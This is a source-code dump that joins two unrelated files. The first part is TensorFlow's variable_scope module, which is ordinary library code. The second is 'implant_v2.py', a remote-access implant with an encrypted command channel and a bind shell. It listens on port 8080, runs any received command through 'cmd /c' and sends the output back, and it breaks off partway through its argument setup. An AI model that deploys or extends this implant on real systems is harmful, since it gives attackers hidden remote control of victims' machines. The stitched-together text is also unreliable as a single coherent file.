self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
self._last_variable_scope_object = None
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" +
self._name_or_scope if self._old.name else self._name_or_scope)
self._reuse = (self._reuse or
self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
self._last_variable_scope_object = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
if (self._var_scope_store.current_scope is
not self._last_variable_scope_object):
raise RuntimeError("Improper nesting of variable_scope.")
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(functools.partial(old_getter, getter), *args, **kwargs)
return wrapped_custom_getter
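# Illustrative sketch (added comment, not from the original source): the custom
# getter signature that _maybe_wrap_custom_getter chains together. Each getter
# receives the next getter in the chain as its first argument and is expected
# to delegate to it.
#
#   def logging_getter(getter, name, *args, **kwargs):
#     print("requesting variable:", name)
#     return getter(name, *args, **kwargs)  # defer to the wrapped getter
#
#   with variable_scope("scope", custom_getter=logging_getter):
#     ...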
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.compat.v1.variable_scope("foo"):
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.compat.v1.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.compat.v1.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.compat.v1.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Keep in mind that the counters for `default_name` are discarded once the
parent scope is exited. Therefore when the code re-enters the scope (for
instance by saving it), all nested default_name counters will be restarted.
For instance:
```python
with tf.compat.v1.variable_scope("foo") as vs:
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("a", [1])
assert v.name == "foo/bar/a:0", v.name
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("b", [1])
assert v.name == "foo/bar_1/b:0"
with tf.compat.v1.variable_scope(vs):
with tf.compat.v1.variable_scope(None, default_name="bar"):
v = tf.compat.v1.get_variable("c", [1])
assert v.name == "foo/bar/c:0" # Uses bar instead of bar_2!
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.compat.v1.variable_scope("foo", reuse=tf.compat.v1.AUTO_REUSE):
v = tf.compat.v1.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("foo", reuse=True):
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.compat.v1.variable_scope("foo") as scope:
v = tf.compat.v1.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.compat.v1.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [1])
v1 = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.compat.v1.variable_scope("foo", reuse=True):
v = tf.compat.v1.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
  scope. Also, when using `default_name`, unique scope names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
  the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.compat.v1.AUTO_REUSE; if `True`, we go into
reuse mode for this scope as well as all sub-scopes; if
tf.compat.v1.AUTO_REUSE, we create variables if they do not exist, and
return them otherwise; if None, we inherit the parent scope's reuse
flag. When eager execution is enabled, new variables are always created
unless an EagerVariableStore or template is currently active.
dtype: type of variables created in this scope (defaults to the type in
the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is not
inherited, and it only takes effect for once when creating. You should
only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if (self._in_graph_mode and not self._building_function and
self._graph_context_manager is not None):
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope, skip_on_eager=False)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(
name_scope, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name, skip_on_eager=False)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
try:
self._cached_pure_variable_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
try:
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg,
traceback_arg)
finally:
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg,
traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(
name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _call_partitioner(partitioner, shape, dtype):
"""Call partitioner validating its inputs/output.
Args:
partitioner: a function mapping `Tensor` shape and dtype to a list of
partitions.
shape: shape of the `Tensor` to partition, must have at least two
dimensions.
dtype: dtype of the elements in the `Tensor`.
Returns:
    A list of integers, each >= 1, with at most one element greater than 1. The
    index of that element corresponds to the partitioning axis.
"""
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable must be "
"fully defined, but instead was %s." % (shape,))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
slicing = partitioner(shape=shape, dtype=dtype)
if not isinstance(slicing, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s" %
slicing)
if len(slicing) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (slicing, shape))
if any(p < 1 for p in slicing):
raise ValueError("Partitioner returned zero partitions for some axes: %s" %
slicing)
if sum(p > 1 for p in slicing) > 1:
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, partitioning: %s" % (shape, slicing))
return slicing
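# Illustrative sketch (added comment, not from the original source): how the
# validation above behaves for a rank-2 shape, assuming
# tensorflow.python.framework.tensor_shape is available for building the shape.
#
#   slicing = _call_partitioner(lambda shape, dtype: [1, 3],
#                               tensor_shape.TensorShape([4, 9]),
#                               dtypes.float32)
#   # slicing == [1, 3]: axis 1 is split into 3 parts.
#   # A partitioner returning [2, 3] would raise, since only one axis
#   # may be partitioned.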
# TODO(slebedev): could be inlined, but
# `_VariableStore._get_partitioned_variable` is too complex even
# without this logic.
def _get_slice_dim_and_num_slices(slicing):
"""Get slicing dimension and number of slices from the partitioner output."""
for slice_dim, num_slices in enumerate(slicing):
if num_slices > 1:
break
else:
# Degenerate case: no partitioning applied.
slice_dim = 0
num_slices = 1
return slice_dim, num_slices
def _iter_slices(full_shape, num_slices, slice_dim):
"""Slices a given a shape along the specified dimension."""
num_slices_with_excess = full_shape[slice_dim] % num_slices
offset = [0] * len(full_shape)
min_slice_len = full_shape[slice_dim] // num_slices
for i in xrange(num_slices):
shape = full_shape[:]
shape[slice_dim] = min_slice_len + bool(i < num_slices_with_excess)
yield offset[:], shape
offset[slice_dim] += shape[slice_dim]
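# Worked example (added comment, not from the original source): slicing a
# [10, 4] shape into 3 slices along dimension 0; the remainder 10 % 3 == 1 is
# absorbed by the first slice.
#
#   list(_iter_slices([10, 4], num_slices=3, slice_dim=0))
#   # -> [([0, 0], [4, 4]), ([4, 0], [3, 4]), ([7, 0], [3, 4])]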
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
distribute_strategy = kwargs.get("distribute_strategy", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
else:
return variables.RefVariable(
initial_value=initial_value,
trainable=trainable,
collections=collections,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
expected_shape=expected_shape,
import_scope=import_scope,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
  The valid keyword arguments in kwargs are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
* collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
* dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* use_resource: if True, a ResourceVariable is always created.
  * synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
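# Illustrative sketch (added comment, not from the original source): a
# composable creator matching the documented signature. It only inspects
# kwargs and then defers to next_creator, so it can be stacked with others.
#
#   def naming_audit_creator(next_creator, **kwargs):
#     print("creating variable:", kwargs.get("name"))
#     return next_creator(**kwargs)
#
#   with variable_creator_scope_v1(naming_audit_creator):
#     v = variable(1.0, name="audited")  # `variable` forwards to VariableV1 above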
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
  The valid keyword arguments in kwargs are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
  * dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
  * synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
implant_v2.py
|
## Redirector Implant - Encrypted C2 and BindShell
## By ShowNadda
## Version 2.0
## Note: Needs "pycryptodome" Library to be Installed!
# Global Imports
import socket, subprocess, threading, argparse
from Crypto import Cipher
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
# Global Variables
port_default = 8080
buffer_limit = 4096
# AES Encryption Setup
class AESCipher:
def __init__(self, key=None):
self.key = key if key else get_random_bytes(32)
self.cipher = AES.new(self.key, AES.MODE_ECB)
def encrypt(self, plaintext):
return self.cipher.encrypt(pad(plaintext, AES.block_size)).hex()
def decrypt(self, encrypted):
return unpad(self.cipher.decrypt(bytearray.fromhex(encrypted)), AES.block_size)
def __str__(self):
return "AES Key used is = {}".format(self.key.hex())
# Creating the ability to send Encrypted Communications
def encrypted_send(s, msg):
s.send(cipher.encrypt(msg).encode("latin-1"))
# Execute Command
def execute_cmd(cmd):
try:
output = subprocess.check_output("cmd /c {}".format(cmd), stderr=subprocess.STDOUT)
except:
output = b"[!] Error: Command failed!"
return output
# Decode Encrypted Data and strip
def decode_and_strip(s):
return s.decode("latin-1").strip()
# Encrypted Shell
def shell_thread(s):
encrypted_send(s, b"[!] Successfully Connected!!!")
try:
while True:
encrypted_send(s, b"\r\n[ReDi]: ")
data = s.recv(buffer_limit)
if data:
buffer = cipher.decrypt(decode_and_strip(data))
buffer = decode_and_strip(buffer)
if not buffer or buffer == "exit":
s.close()
exit()
print("[!] Now Executing Command: '{}'".format(buffer))
encrypted_send(s, execute_cmd(buffer))
except:
s.close()
exit()
# Creating the ability to send Commands to another Implant
def send_thread(s):
try:
while True:
data = input() + "\n"
encrypted_send(s, data.encode("latin-1"))
except:
s.close()
exit()
# Creating the ability to listen for Commands from other Implants
def recv_thread(s):
try:
while True:
data = decode_and_strip(s.recv(buffer_limit))
if data:
data = cipher.decrypt(data).decode("latin-1")
print(data, end="", flush=True)
except:
s.close()
exit()
# Creating the Server for the Implant to run as
def server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port_default))
s.listen()
print("[!] Redirector Server has started!!!")
while True:
client_socket, addr = s.accept()
print("[+] New Session has started!!!")
threading.Thread(target=shell_thread, args=(client_socket,)).start()
# Creating the Client for the Implant to run as
def client(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port_default))
print("[!] Now Connecting to Redirector Implant!!!")
threading.Thread(target=send_thread, args=(s,)).start()
threading.Thread(target=recv_thread, args=(s,)).start()
# Creates the Commands and their required Arguments
parser = argparse.ArgumentParser()
parser.add_argument("-l", "--listen", action="store_true", help="Create a Redirector Server", required=False)
